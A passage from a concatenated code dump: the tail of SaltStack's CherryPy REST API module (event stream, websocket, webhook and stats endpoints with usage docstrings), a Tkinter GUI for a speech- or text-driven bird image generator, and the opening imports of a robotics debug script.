Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
'''
cookies = cherrypy.request.cookie
auth_token = token or salt_token or (
cookies['session_id'].value if 'session_id' in cookies else None)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers['Content-Type'] = 'text/event-stream'
cherrypy.response.headers['Cache-Control'] = 'no-cache'
cherrypy.response.headers['Connection'] = 'keep-alive'
def listen():
'''
An iterator to yield Salt events
'''
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
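# Per the SSE spec, the "retry" field asks clients to wait this many
# milliseconds before attempting to reconnect.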
yield u'retry: {0}\n'.format(400)
while True:
data = next(stream)
yield u'tag: {0}\n'.format(data.get('tag', ''))
yield u'data: {0}\n\n'.format(json.dumps(data))
return listen()
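# Illustrative client-side sketch (not part of this module): consuming the
# /events stream from Python with only the standard library. The field names
# match the SSE format emitted by listen() above; the token value is a
# placeholder.
#
#     import json
#     import urllib.request
#
#     req = urllib.request.Request(
#         'http://localhost:8000/events?token=<session token here>')
#     with urllib.request.urlopen(req) as stream:
#         for raw in stream:
#             line = raw.decode('utf-8').strip()
#             if line.startswith('data: '):
#                 event = json.loads(line[len('data: '):])
#                 print(event['tag'], event['data'])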
class WebsocketEndpoint(object):
'''
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
The examples above show how to establish a websocket connection to Salt
and activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
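# The child process above pushes events to the websocket handler for the
# lifetime of the connection and exits via the SIGTERM handler registered
# inside event_stream() when it is terminated.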
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason, authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
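# Illustrative client-side sketch (not part of this module): firing a hook
# event using only the standard library. The tag components and payload are
# placeholders; this assumes webhook auth is disabled, otherwise an
# X-Auth-Token header must also be sent.
#
#     import json
#     import urllib.request
#
#     body = json.dumps({'revision': 'aa22a3c4b2e7', 'result': True}).encode()
#     req = urllib.request.Request(
#         'http://localhost:8000/hook/mycompany/build/success',
#         data=body, headers={'Content-Type': 'application/json'})
#     print(urllib.request.urlopen(req).read())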
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
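# Note: get_app() is this module's entry point; the salt-api CherryPy runner
# is expected to mount ``root`` with ``cpyopts`` as the application config.
# The exact wiring lives outside this file.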
|
gui.py
|
from Tkinter import *
import ttk
import tkMessageBox
import sys
import main
import os
import speech_recognition as sr
from PIL import ImageTk, Image
import recording
import time
import threading
class Application(Frame):
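'''
Tkinter front end for a text-to-image bird generator: the user either
speaks or types a bird description, which is written to a caption file and
rendered by an AttnGAN-style evaluation script (``main.py``, assumed to
live alongside this file) in _runTextToImage(); the resulting images are
shown in a tabbed viewer comparing two models.
'''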
def create_widgets(self):
self.image = Image.open('pictures/Backgrounds_bird.jpg')
self.img_copy = self.image.copy()
self.backgroundImage = ImageTk.PhotoImage(self.image)
self.imageBG = Label(self, image = self.backgroundImage)
self.imageBG.pack(fill=BOTH, expand=YES)
self.imageBG.bind('<Configure>', self._resize_image)
titleText = "Let's get your bird!"
self.Title = Label(self.imageBG, text = titleText, bg = '#D3D3D3')
self.Title.place(relx = 0.5, rely = 0.1, anchor = N)
self.Title.config(font = ('Helvetica', 22))
self.imgSpeak = Image.open('pictures/speak.png')
self.buttonImg1 = ImageTk.PhotoImage(self.imgSpeak)
self.speakBird = Button(self.imageBG, image = self.buttonImg1, command = self.speak_bird)
self.speakBird.place(relx = 0.4, rely = 0.45, anchor = CENTER)
self.imgType = Image.open('pictures/computer.png')
self.buttonImg2 = ImageTk.PhotoImage(self.imgType)
self.typeBird = Button(self.imageBG, image = self.buttonImg2, command = self.type_bird)
self.typeBird.place(relx = 0.6, rely = 0.45, anchor = CENTER)
self.imgExit = Image.open('pictures/exit.png')
self.imgExit = self.imgExit.resize((32, 32))
self.buttonImg3 = ImageTk.PhotoImage(self.imgExit)
self.QUIT = Button(self.imageBG, image = self.buttonImg3, command = self.quit)
self.QUIT.place(relx = 1, rely = 1, anchor = SE)
def speak_bird(self):
magic = Toplevel()
x_c = (self.screen_width/2) - 150
y_c = (self.screen_height/2) - 100
magic.geometry("300x200+%d+%d" % (x_c, y_c))
magic.title('Speak out your bird!')
timeCountText = 'Time: --:--'
self.timeCount = Label(magic, text = timeCountText)
self.timeCount.place(relx = 0.5, rely = 0.2, anchor = N)
startImg = Image.open('pictures/play.png')
startImg = startImg.resize((32, 32))
startButtonImg = ImageTk.PhotoImage(startImg)
start = Button(magic, image = startButtonImg, command = self._startRecording)
start.image = startButtonImg
start.place(relx = 0.35, rely = 0.5, anchor = CENTER)
stopImg = Image.open('pictures/stop.png')
stopImg = stopImg.resize((32, 32))
stopButtonImg = ImageTk.PhotoImage(stopImg)
stop = Button(magic, image = stopButtonImg, command = self._stopRecording)
stop.image = stopButtonImg
stop.place(relx = 0.5, rely = 0.5, anchor = CENTER)
showImg = Image.open('pictures/monitor.png')
showImg = showImg.resize((32, 32))
showButtonImg = ImageTk.PhotoImage(showImg)
show = Button(magic, image = showButtonImg, command = self._showResult)
show.image = showButtonImg
show.place(relx = 0.65, rely = 0.5, anchor = CENTER)
exitImg = Image.open('pictures/logout.png')
exitButtonImg = ImageTk.PhotoImage(exitImg)
exit = Button(magic, image = exitButtonImg, command = magic.destroy)
exit.image = exitButtonImg
exit.place(relx = 1, rely = 1, anchor = SE)
return
def type_bird(self, text = ''):
magic = Toplevel()
x_c = (self.screen_width/2) - 150
y_c = (self.screen_height/2) - 100
magic.geometry("300x200+%d+%d" % (x_c, y_c))
magic.title('Type your bird!')
title = Label(magic, text = 'Type in your bird')
title.place(relx = 0.5, rely = 0.1, anchor = N)
self.textEntry = Entry(magic, width = 25)
self.textEntry.place(relx = 0.5, rely = 0.4, anchor = CENTER)
self.textEntry.insert(INSERT, text)
okImg = Image.open('pictures/ok.png')
okButtonImg = ImageTk.PhotoImage(okImg)
okButton = Button(magic, image = okButtonImg, command = self._saveTextToFile)
okButton.image = okButtonImg
okButton.place(relx = 0.5, rely = 0.7, anchor = S)
exitImg = Image.open('pictures/logout.png')
exitButtonImg = ImageTk.PhotoImage(exitImg)
exit = Button(magic, image = exitButtonImg, command = magic.destroy)
exit.image = exitButtonImg
exit.place(relx = 1, rely = 1, anchor = SE)
return
def _saveTextToFile(self):
bird = self.textEntry.get()
self._runTextToImage(bird)
return
def _runTextToImage(self, bird):
file = open('../data/birds/example_captions.txt', 'w')
file.write(bird)
file.close()
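# Hand the caption file to the image-generation script; os.system blocks
# until the external process finishes.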
os.system('python main.py --cfg cfg/eval_bird.yml')
pic = Toplevel()
'''
rows = 0
while rows < 50:
pic.rowconfigure(rows, weight = 1)
pic.columnconfigure(rows, weight = 1)
rows += 1
'''
nb = ttk.Notebook(pic)
#nb.grid(row = 1, column = 0, columnspan = 50, rowspan = 49, sticky = 'NESW')
old = self._createPictures_old(nb)
new = self._createPictures_new(nb)
nb.add(old, text = 'Original Model')
nb.add(new, text = 'Our Model')
nb.pack(expand = True, fill = BOTH)
return
def _createPictures_old(self, notebook):
old = ttk.Frame(notebook)
#old.title('Image in 256 pixels')
titleText = "Original Model"
self.Title = Label(old, text = titleText)
self.Title.grid(row = 0, column = 0, columnspan = 2)
self.Title.config(font = ('Helvetica', 44))
bird_imga0 = Image.open('../models/old/example_captions/0_s_0_a0.png')
bird_imga0 = bird_imga0.resize((580, 150))
bird_imga0 = ImageTk.PhotoImage(bird_imga0)
bird_imga1 = Image.open('../models/old/example_captions/0_s_0_a1.png')
bird_imga1 = bird_imga1.resize((580, 150))
bird_imga1 = ImageTk.PhotoImage(bird_imga1)
bird_imgg0 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/0_s_0_g0.png'))
bird_imgg1 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/0_s_0_g1.png'))
bird_imgg2 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/0_s_0_g2.png'))
bird_img1a0 = Image.open('../models/old/example_captions/1_s_0_a0.png')
bird_img1a0 = bird_img1a0.resize((580, 150))
bird_img1a0 = ImageTk.PhotoImage(bird_img1a0)
bird_img1a1 = Image.open('../models/old/example_captions/1_s_0_a1.png')
bird_img1a1 = bird_img1a1.resize((580, 150))
bird_img1a1 = ImageTk.PhotoImage(bird_img1a1)
bird_img1g0 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/1_s_0_g0.png'))
bird_img1g1 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/1_s_0_g1.png'))
bird_img1g2 = ImageTk.PhotoImage(Image.open('../models/old/example_captions/1_s_0_g2.png'))
canvas1 = Canvas(old, width=600, height=850, scrollregion=(0,0,600,900)) #width=1256, height = 1674)
canvas1.grid(row=1, column=0, sticky="nsew") #added sticky
canvas1.create_image(10 , 10, anchor=NW, image=bird_imga0)
canvas1.create_image(10, 180, anchor=NW, image=bird_imga1)
canvas1.create_image(268, 350, anchor=NW, image=bird_imgg0)
canvas1.create_image(236, 430, anchor=NW, image=bird_imgg1)
canvas1.create_image(172, 580, anchor=NW, image=bird_imgg2)
canvas2 = Canvas(old, width=600, height=850, scrollregion=(0,0,600,900)) #width=1256, height = 1674)
canvas2.grid(row=1, column=1, sticky="nsew") #added sticky
canvas2.create_image(10 , 10, anchor=NW, image=bird_img1a0)
canvas2.create_image(10, 180, anchor=NW, image=bird_img1a1)
canvas2.create_image(268, 350, anchor=NW, image=bird_img1g0)
canvas2.create_image(236, 430, anchor=NW, image=bird_img1g1)
canvas2.create_image(172, 580, anchor=NW, image=bird_img1g2)
img00 = Label(old, image = bird_imga0)
img00.image = bird_imga0
img01 = Label(old, image = bird_imga1)
img01.image = bird_imga1
img02 = Label(old, image = bird_imgg0)
img02.image = bird_imgg0
img03 = Label(old, image = bird_imgg1)
img03.image = bird_imgg1
img04 = Label(old, image = bird_imgg2)
img04.image = bird_imgg2
img10 = Label(old, image = bird_img1a0)
img10.image = bird_img1a0
img11 = Label(old, image = bird_img1a1)
img11.image = bird_img1a1
img12 = Label(old, image = bird_img1g0)
img12.image = bird_img1g0
img13 = Label(old, image = bird_img1g1)
img13.image = bird_img1g1
img14 = Label(old, image = bird_img1g2)
img14.image = bird_img1g2
return old
def _createPictures_new(self, notebook):
new = ttk.Frame(notebook)
#new.title('Image in 512 pixels')
titleText = "Our Model"
self.Title = Label(new, text = titleText)
self.Title.grid(row = 0, column = 0, columnspan = 4)
self.Title.config(font = ('Helvetica', 44))
bird_imga0 = Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_a0.png')
bird_imga0 = bird_imga0.resize((580, 150))
bird_imga0 = ImageTk.PhotoImage(bird_imga0)
bird_imga1 = Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_a1.png')
bird_imga1 = bird_imga1.resize((580, 150))
bird_imga1 = ImageTk.PhotoImage(bird_imga1)
bird_imga2 = Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_a2.png')
bird_imga2 = bird_imga2.resize((580, 150))
bird_imga2 = ImageTk.PhotoImage(bird_imga2)
bird_imgg0 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g0.png'))
bird_imgg1 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g1.png'))
bird_imgg2 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g2.png'))
bird_imgg3 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/0_s_0_g3.png'))
bird_img1a0 = Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_a0.png')
bird_img1a0 = bird_img1a0.resize((580, 150))
bird_img1a0 = ImageTk.PhotoImage(bird_img1a0)
bird_img1a1 = Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_a1.png')
bird_img1a1 = bird_img1a1.resize((580, 150))
bird_img1a1 = ImageTk.PhotoImage(bird_img1a1)
bird_img1a2 = Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_a2.png')
bird_img1a2 = bird_img1a2.resize((580, 150))
bird_img1a2 = ImageTk.PhotoImage(bird_img1a2)
bird_img1g0 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g0.png'))
bird_img1g1 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g1.png'))
bird_img1g2 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g2.png'))
bird_img1g3 = ImageTk.PhotoImage(Image.open('../models/bird_AttnGAN2/example_captions/1_s_0_g3.png'))
canvas1 = Canvas(new, width=600, height=900, scrollregion=(0,0,600,1600)) #width=1256, height = 1674)
canvas1.grid(row=1, column=0, sticky="nsew") #added sticky
canvas1.create_image(10 , 10, anchor=NW, image=bird_imga0)
canvas1.create_image(10, 180, anchor=NW, image=bird_imga1)
canvas1.create_image(10, 350, anchor=NW, image=bird_imga2)
canvas1.create_image(268, 520, anchor=NW, image=bird_imgg0)
canvas1.create_image(236, 600, anchor=NW, image=bird_imgg1)
canvas1.create_image(172, 750, anchor=NW, image=bird_imgg2)
canvas1.create_image(44, 1030, anchor=NW, image=bird_imgg3)
ybar1=Scrollbar(new, orient='vertical', command=canvas1.yview)
ybar1.grid(row=1, column=1, sticky="ns")
canvas1.configure(yscrollcommand = ybar1.set)
canvas2 = Canvas(new, width=600, height=900, scrollregion=(0,0,600,1600)) #width=1256, height = 1674)
canvas2.grid(row=1, column=2, sticky="nsew") #added sticky
canvas2.create_image(10 , 10, anchor=NW, image=bird_img1a0)
canvas2.create_image(10, 180, anchor=NW, image=bird_img1a1)
canvas2.create_image(10, 350, anchor=NW, image=bird_img1a2)
canvas2.create_image(268, 520, anchor=NW, image=bird_img1g0)
canvas2.create_image(236, 600, anchor=NW, image=bird_img1g1)
canvas2.create_image(172, 750, anchor=NW, image=bird_img1g2)
canvas2.create_image(44, 1030, anchor=NW, image=bird_img1g3)
ybar2=Scrollbar(new, orient='vertical', command=canvas2.yview)
ybar2.grid(row=1, column=3, sticky="ns")
canvas2.configure(yscrollcommand = ybar2.set)
img00 = Label(new, image = bird_imga0)
img00.image = bird_imga0
img01 = Label(new, image = bird_imga1)
img01.image = bird_imga1
img02 = Label(new, image = bird_imga2)
img02.image = bird_imga2
img03 = Label(new, image = bird_imgg0)
img03.image = bird_imgg0
img04 = Label(new, image = bird_imgg1)
img04.image = bird_imgg1
img05 = Label(new, image = bird_imgg2)
img05.image = bird_imgg2
img06 = Label(new, image = bird_imgg3)
img06.image = bird_imgg3
img10 = Label(new, image = bird_img1a0)
img10.image = bird_img1a0
img11 = Label(new, image = bird_img1a1)
img11.image = bird_img1a1
img12 = Label(new, image = bird_img1a2)
img12.image = bird_img1a2
img13 = Label(new, image = bird_img1g0)
img13.image = bird_img1g0
img14 = Label(new, image = bird_img1g1)
img14.image = bird_img1g1
img15 = Label(new, image = bird_img1g2)
img15.image = bird_img1g2
img16 = Label(new, image = bird_img1g3)
img16.image = bird_img1g3
return new
def _resize_image(self, event):
new_width = event.width
new_height = event.height
self.image = self.img_copy.resize((new_width, new_height))
self.backgroundImage = ImageTk.PhotoImage(self.image)
self.imageBG.configure(image = self.backgroundImage)
def _startRecording(self):
self.birdrec = self.rc.open('bird.wav', 'wb')
self.birdrec.start_recording()
self.flag = True
timeThread = threading.Thread(target = self._timeRunning)
timeThread.start()
return
def _stopRecording(self):
self.birdrec.stop_recording()
self.flag = False
return
def _timeRunning(self, t = 0):
while self.flag:
mins, secs = divmod(t, 60)
mins = int(round(mins))
secs = int(round(secs))
timeformat = '{:02d}:{:02d}'.format(mins, secs)
self.timeCount['text'] = 'Time: ' + timeformat
time.sleep(1)
t += 1
return
def _showResult(self):
self.timeCount['text'] = 'Time: --:--'
with sr.AudioFile('bird.wav') as source:
bird = self.recognizer.record(source)
try:
bird = self.recognizer.recognize_google(bird)
#tkMessageBox.showinfo(message = 'We are drawing your bird:\n' + bird)
#self._runTextToImage(bird)
self.type_bird(text = bird)
except sr.UnknownValueError:
tkMessageBox.showerror(message = "Sorry! we did not get your bird. Please try again!")
except sr.RequestError as e:
tkMessageBox.showerror(message = 'Sorry! Something went wrong with recognizer, please try again!')
return
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.screen_width = self.master.winfo_screenwidth()
self.screen_height = self.master.winfo_screenheight()
self.master.title('Speak out and get your bird')
x_c = (self.screen_width/2)-300
y_c = (self.screen_height/2)-200
self.master.geometry("600x400+%d+%d" % (x_c, y_c))
self.pack(fill=BOTH, expand=YES)
self.rc = recording.Recorder()
self.recognizer = sr.Recognizer()
self.recognizer.energy_threshold = 6000
self.flag = True
self.create_widgets()
root = Tk()
app = Application(master=root)
app.mainloop()
root.destroy()
|
rhcdebug.py
|
#!/usr/bin/env python3
# Copyright (c) 2019, The Personal Robotics Lab, The MuSHR Team, The Contributors of MuSHR
# License: BSD 3-Clause. See LICENSE.md file in root directory.
import threading
import matplotlib.cm as cm
import matplotlib.colors as mplcolors
import rospy
import torch
